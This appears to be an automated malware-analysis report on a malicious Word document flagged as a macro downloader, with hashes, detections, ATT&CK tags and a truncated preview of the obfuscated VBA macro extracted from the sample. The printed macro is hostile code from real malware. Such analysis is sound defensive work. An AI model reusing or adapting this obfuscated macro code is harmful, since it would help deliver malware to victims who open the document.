Office (OLE) malware analysis — malicious · fb82fd4534d7c32a

MALICIOUS

Office (OLE)

184.5 KB Created: 2018-05-02 20:50:00 Authoring application: Microsoft Office Word First seen: 2019-01-11

MD5: bdce6d8e2110cd49c9d923f1e6c7503d SHA-1: 8f78ffbb5b40c456abeaf6acb9c2a5afc99190ef SHA-256: fb82fd4534d7c32a3de8523fde2d59b7c26146eae1827c0b4202630e3004c587

122 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Downloader.Macro-6539595-0, indicating it's a macro-based downloader. The presence of a Document_Open macro and embedded VBA code strongly suggests the document's primary purpose is to execute malicious code upon opening. The VBA script, though obfuscated, likely attempts to download and execute a secondary payload, aligning with common downloader tactics.

Heuristics 4

ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12720 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12720 bytes
SHA-256: `5efd1574aa0c79c5df1b8b6c547265d130c512a8a3ab82fa1299c2f8e041c61e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function tagasaste(brambling, monestrous, meatball) Dim actinomyces As Long Dim tamely As Variant Dim fluorite As Long Dim embers As Variant Dim elsholtzia As Long Dim redcoat As Variant Dim melampsoraceae As Long Dim tinca As Variant Dim adorable As Long Dim delonix As String Dim arithmancy As Byte cimarron = cimarron / 167 cimarron = Rnd(369) actinomyces = brambling adorable = meatball nitid = Rnd(477) elsholtzia = monestrous phocaena = 44 + 22 Pmt 0, phocaena, 25097, 47104, 2 mete = "neuromotor" fluorite = 51 - 101 + 49 lady ByVal fluorite, actinomyces, elsholtzia, adorable, melampsoraceae nitid = Fix(307) End Function Sub apt() Dim swishing As Variant Dim casablanca As Long worth.majeure.Value = Day(#12/5/2013#) varday = lackbrain = actionable hackee = "centenary" chancellorship = cato blended = harebell doubly = "profoundly" idealization = "ditheism" attacker = "atomization" Set cloak = worth.majeure.SelectedItem volva = 36 + 10 Pmt 0, volva, 3692, 36111, 4 dipodomys = cloak.Name churlishly = 117 - 114 + 7841 distributor = Right(dipodomys, churlishly) ant = hardliner.occasionem(distributor) maxillaria = 27 + 15 Pmt 0, maxillaria, 28216, 28779, 8 informal = "empyreal" #If (126 - 7 + 281 + 103 - 121 + 318) > ((70 - 36 + 286) - (26 - 23 + 537) * 1) And ((113 - 71 - 14) - (79 - 32 - 19)) * 2 < (Win64) Then Dim statistic As Variant Dim enteric As LongPtr Dim begonia As LongPtr Dim mica As Variant #ElseIf (19 - 26 + 407 + 26 - 22 + 296) > ((86 - 18 + 252) - (27 - 59 + 572) * 1) And Not ((47 - 66 + 47) - (113 - 74 - 11)) * 2 < (Win64) Then Dim dryden As String Dim begonia As Long Dim neurosarcoma As String Dim enteric As Long #End If carboniferous = 95 - 97 + 2 compassionate = "valediction" accrust = 10 - 51 + 4137 austerely = 24 + 23 Pmt 0, austerely, 9585, 17386, 2 prisons = agathis hoi = "messalina" hardware = dig schooling = "incombustible" fettuccine = 3 + 25 Pmt 0, fettuccine, 32062, 47578, 3 ningal = ant fertile = "zerronnen" maniple = bota enteric = bells(ningal) katharometer = adaption paixhan = "sprout" #If (5 - 2 + 397 + 101 - 22 + 221) > ((4 - 51 + 367) - (11 - 63 + 592) * 1) And ((110 - 27 - 55) - (41 - 54 + 41)) * 2 < (Win64) Then Dim arrectis As Variant Dim confute As LongPtr Dim heist As LongPtr Dim fur As LongPtr podiatry = 63 - 124 + 2125 #ElseIf (55 - 19 + 364 + 120 - 6 + 186) > ((84 - 111 + 347) - (126 - 9 + 423) * 1) And Not ((68 - 73 + 33) - (18 - 115 + 125)) * 2 < (Win64) Then Dim confute As Long aculeate = 118 - 47 + 710 Dim heist As Long Dim fur As Long podiatry = aculeate + 3459 #End If Dim forelay As Integer Dim unornamented As String confute = 94 - 49 - 45 begonia = enteric + podiatry heist = 16 - 104 + 201615 fur = 72 - 89 + 3517 artificially = fissurellidae(heist, confute, begonia, confute, confute, confute, confute) aguardiente = 6 + 29 Pmt 0, aguardiente, 32627, 32363, 7 End Sub Function spirituality(carambola, piquancy, crystallized) Dim furioso As Variant Dim alligatorfish As Integer Dim divorcement As LongPtr Dim latchkey As LongPtr Dim mornful As LongPtr Dim argentinosaur As Long Dim jab As LongPtr Dim fiddleneck As LongPtr nitid = Rnd(443) diarist = diarist latchkey = carambola fiddleneck = crystallized diarist = diarist jab = piquancy burnout = 32 + 51 Pmt 0, burnout, 29068, 16169, 8 diarist = mete divorcement = 45 - 91 + 45 lady ByVal divorcement, _ latchkey, _ jab, fiddleneck, _ mornful mete = "ordovician" End Function Function bells(screeen) Dim cede As Variant Dim editorship As Byte Dim antilles As Byte Dim manet As Integer #If (26 - 88 + 462 + 123 - 52 + 229) > ((61 - 51 + 310) - (54 - 37 + 523) * 1) And ((36 - 105 + 97) - (52 - 123 + 99)) * 2 < (Win64) Then D ... (truncated)

SHA-256: 5efd1574aa0c79c5df1b8b6c547265d130c512a8a3ab82fa1299c2f8e041c61e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function tagasaste(brambling, monestrous, meatball)
Dim actinomyces As Long
Dim tamely As Variant
Dim fluorite As Long
Dim embers As Variant
Dim elsholtzia As Long
Dim redcoat As Variant
Dim melampsoraceae As Long
Dim tinca As Variant
Dim adorable As Long
Dim delonix As String
Dim arithmancy As Byte
cimarron = cimarron / 167
cimarron = Rnd(369)
actinomyces = brambling
adorable = meatball
nitid = Rnd(477)
elsholtzia = monestrous
phocaena = 44 + 22
Pmt 0, phocaena, 25097, 47104, 2
mete = "neuromotor"
fluorite = 51 - 101 + 49
lady ByVal fluorite, actinomyces, elsholtzia, adorable, melampsoraceae
nitid = Fix(307)
End Function
Sub apt()
Dim swishing As Variant
Dim casablanca As Long
worth.majeure.Value = Day(#12/5/2013#)
varday = lackbrain = actionable
hackee = "centenary"
chancellorship = cato
blended = harebell
doubly = "profoundly"
idealization = "ditheism"
attacker = "atomization"
Set cloak = worth.majeure.SelectedItem
volva = 36 + 10
Pmt 0, volva, 3692, 36111, 4
dipodomys = cloak.Name
churlishly = 117 - 114 + 7841
distributor = Right(dipodomys, churlishly)
ant = hardliner.occasionem(distributor)
maxillaria = 27 + 15
Pmt 0, maxillaria, 28216, 28779, 8
informal = "empyreal"
#If (126 - 7 + 281 + 103 - 121 + 318) > ((70 - 36 + 286) - (26 - 23 + 537) * 1) And ((113 - 71 - 14) - (79 - 32 - 19)) * 2 < (Win64) Then
Dim statistic As Variant
Dim enteric As LongPtr
Dim begonia As LongPtr
Dim mica As Variant
#ElseIf (19 - 26 + 407 + 26 - 22 + 296) > ((86 - 18 + 252) - (27 - 59 + 572) * 1) And Not ((47 - 66 + 47) - (113 - 74 - 11)) * 2 < (Win64) Then
Dim dryden As String
Dim begonia As Long
Dim neurosarcoma As String
Dim enteric As Long
#End If
carboniferous = 95 - 97 + 2
compassionate = "valediction"
accrust = 10 - 51 + 4137
austerely = 24 + 23
 Pmt 0, austerely, 9585, 17386, 2

prisons = agathis
hoi = "messalina"
hardware = dig
schooling = "incombustible"
fettuccine = 3 + 25
 Pmt 0, fettuccine, 32062, 47578, 3

ningal = ant
fertile = "zerronnen"
maniple = bota
enteric = bells(ningal)
katharometer = adaption
paixhan = "sprout"
#If (5 - 2 + 397 + 101 - 22 + 221) > ((4 - 51 + 367) - (11 - 63 + 592) * 1) And ((110 - 27 - 55) - (41 - 54 + 41)) * 2 < (Win64) Then
Dim arrectis As Variant
Dim confute As LongPtr
Dim heist As LongPtr
Dim fur As LongPtr
podiatry = 63 - 124 + 2125
#ElseIf (55 - 19 + 364 + 120 - 6 + 186) > ((84 - 111 + 347) - (126 - 9 + 423) * 1) And Not ((68 - 73 + 33) - (18 - 115 + 125)) * 2 < (Win64) Then
Dim confute As Long
aculeate = 118 - 47 + 710
Dim heist As Long
Dim fur As Long
podiatry = aculeate + 3459

#End If
Dim forelay As Integer
Dim unornamented As String
confute = 94 - 49 - 45
begonia = enteric + podiatry
heist = 16 - 104 + 201615
fur = 72 - 89 + 3517
artificially = fissurellidae(heist, confute, begonia, confute, confute, confute, confute)
aguardiente = 6 + 29
 Pmt 0, aguardiente, 32627, 32363, 7

End Sub

Function spirituality(carambola, piquancy, crystallized)
Dim furioso As Variant
Dim alligatorfish As Integer
Dim divorcement As LongPtr
Dim latchkey As LongPtr
Dim mornful As LongPtr
Dim argentinosaur As Long
Dim jab As LongPtr
Dim fiddleneck As LongPtr
nitid = Rnd(443)
diarist = diarist
latchkey = carambola
fiddleneck = crystallized
diarist = diarist
jab = piquancy
burnout = 32 + 51
 Pmt 0, burnout, 29068, 16169, 8

diarist = mete
divorcement = 45 - 91 + 45
lady ByVal divorcement, _
latchkey, _
jab, fiddleneck, _
mornful
mete = "ordovician"
End Function
Function bells(screeen)
Dim cede As Variant
Dim editorship As Byte
Dim antilles As Byte
Dim manet As Integer
#If (26 - 88 + 462 + 123 - 52 + 229) > ((61 - 51 + 310) - (54 - 37 + 523) * 1) And ((36 - 105 + 97) - (52 - 123 + 99)) * 2 < (Win64) Then
D
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.